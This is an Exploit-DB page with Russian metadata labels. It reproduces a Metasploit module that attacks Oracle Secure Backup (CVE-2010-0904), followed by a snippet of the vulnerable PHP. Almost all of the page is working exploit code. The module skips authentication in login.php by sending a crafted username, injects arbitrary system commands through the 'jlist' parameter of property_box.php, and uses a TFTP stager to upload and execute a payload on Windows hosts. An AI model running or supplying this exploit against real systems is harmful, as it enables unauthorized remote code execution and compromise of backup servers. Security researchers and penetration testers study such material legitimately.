- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 17698
- Проверка EDB
-
- Пройдено
- Автор
- METASPLOIT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-0904
- Дата публикации
- 2011-08-19
Код:
##
# $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in login.php. In conjuction with the authentication bypass issue,
the 'jlist' parameter in property_box.php can be used to execute
arbitrary system commands.
This module was tested against Oracle Secure Backup version 10.3.0.1.0
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13591 $',
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
[ 'CVE', '2010-0904' ],
# the jlist vector has not been disclosed or has it?
],
'Targets' =>
[
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
]
],
'Privileged' => 'true',
'Platform' => 'win',
'DisclosureDate' => 'Jul 13 2010',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
], self.class)
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")
execute_command(@payload_exe)
end
def execute_command(cmd, opts = {})
res = send_request_cgi(
{
'uri' => '/login.php',
'data' => 'attempt=1&uname=-',
'method' => 'POST',
}, 5)
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
sessionid = res.headers['Set-Cookie'].split(';')[0]
data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
send_request_raw(
{
'uri' => '/property_box.php' + data,
'cookie' => sessionid,
'method' => 'GET',
}, 5)
else
print_error("Invalid PHPSESSION token..")
return
end
end
def exploit
if not datastore['CMD'].empty?
print_status("Executing command '#{datastore['CMD']}'")
execute_command(datastore['CMD'])
return
end
case target['Platform']
when 'win'
windows_stager
else
raise RuntimeError, 'Target not supported.'
end
handler
end
end
__END__
else if (strcmp($type, "Job") == 0)
{
if (!is_array($objectname))
$objectname = array();
reset($objectname);
while (list(,$oname) = each($objectname))
{
$oname = escapeshellarg($oname);
$jlist = "$jlist $oname";
}
if (strlen($jlist) > 0)
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
- Источник
- www.exploit-db.com